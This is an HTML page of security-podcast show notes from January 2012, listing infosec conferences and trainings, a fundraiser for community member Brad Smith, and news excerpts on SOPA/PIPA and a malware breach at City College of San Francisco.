<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#222222;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anti PIPA/SOPA Meetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 18, 2012<br class="kix-line-break" /><br />
	Where: NY Tech Meetup HQ, New York City</span><br />
	<a href="http://www.meetup.com/ny-tech/events/47879702/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.meetup.com/ny-tech/events/47879702/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://projects.ajc.com/gallery/view/metro/atlanta/mlk-day-atlanta-011612"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://projects.ajc.com/gallery/view/metro/atlanta/mlk-day-atlanta-011612</span></a></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Happy </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Martin Luther King, Jr. Day. &nbsp;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.examiner.com/computers-in-denver/house-kills-sopa"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.examiner.com/computers-in-denver/house-kills-sopa</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a surprise move today, Representative Eric Cantor(R-VA) announced that he will stop all action on SOPA, effectively killing the bill. This move was most likely due to several things. One of those things is that SOPA and PIPA met huge online protest against the bills. Another reason would be that the White House threatened to veto the bill if it had passed. However, it isn&#39;t quite time yet to celebrate, as PIPA(the Senate&#39;s version of SOPA) is still up for consideration.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The online protests about the bill were surprising and large. They ranged anywhere from callng Representatives, companies, and senators to get them to change their mind, to actively moving domain&#39;s away from and targeting the business model of the companies that supported/lobbied for the bill. GoDaddy lost well over 100,000 domains in the space of about 10 days due to their involvement with these bills, along with other various targets. Reddit in particular has been influential in turning the tide against SOPA and PIPA, and is a good demonstration of how the Internet enables Democracy.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.techdirt.com/articles/20120116/02442717414/harry-reid-says-hes-concerned-pipa-will-break-internet-we-must-move-forward-with-it-because-jobs.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.techdirt.com/articles/20120116/02442717414/harry-reid-says-hes-concerned-pipa-will-break-internet-we-must-move-forward-with-it-because-jobs.shtml</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a short appearance on </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meet the Press</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on Sunday, Senate leader Harry Reid continued to insist that</span><a href="http://www.msnbc.msn.com/id/3032608/vp/46004838#46004838"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the Senate intended to move forward with PIPA</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, despite the widespread concerns, despite the White House&#39;s statement against the bill, and despite multiple Senators &#8212; including bill co-sponsors &#8212; asking him to hold off putting the bill to a vote. </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What&#39;s stunning is how misleading Senator Reid is being here. First, he claims that the bill is about &quot;jobs,&quot; despite a total lack of evidence that that&#39;s true. In fact, as has been noted plenty of times here, the part of the economy that </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">is</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> creating jobs &#8212; the startup/tech sector &#8212; is the one who gets burdened by this bill. David Gregory then responds by pointing out that people keep pointing out to him online that this bill isn&#39;t really about jobs, and will harm the internet. Reid then tries to pretend that this is a new revelation. He notes that it was &quot;reported out of the committee unanimously&quot; back in May. That&#39;s true, but that was back before most people understood the bill, or the internet had spoken out. Even then, many of us were quite clear in speaking out about why this bill was a problem. But Harry Reid pretends that it&#39;s &quot;just in the last few weeks&quot; that anyone has raised concerns.&quot; That&#39;s flat out ridiculous.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2012/01/12/MN4Q1MO9JK.DTL"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2012/01/12/MN4Q1MO9JK.DTL</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Personal banking information and other data from perhaps tens of thousands of students, faculty and administrators at City College of San Francisco have been stolen in what is being called &quot;an infestation&quot; of computer viruses with origins in criminal networks in Russia, China and other countries, The Chronicle has learned.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At work for more than a decade, the viruses were detected a few days after</span><a href="http://www.sfgate.com/thanksgiving/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Thanksgiving</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, when the college&#39;s data security monitoring service detected an unusual pattern of computer traffic, flagging trouble.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It appeared at first that the problem was contained in a single computer lab at Cloud Hall on the Phelan Avenue campus, one of a dozen City College sites around the city. David Hotchkiss, the chief technology officer, immediately shut the lab down and reported the problem to Chancellor Don Griffin, General Counsel Scott Dickey and Board of Trustees President John Rizzo.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But a closer look revealed a far more nefarious situation, which had been lurking within the college&#39;s electronic systems since 1999. For now, it&#39;s still going on. So far, no cases of identify theft have been linked to the breach. That may change as the investigation continues, and college officials said they might need to bring in the FBI.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The college&#39;s payroll, admissions and accounting systems have yet to be analyzed for the viruses.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
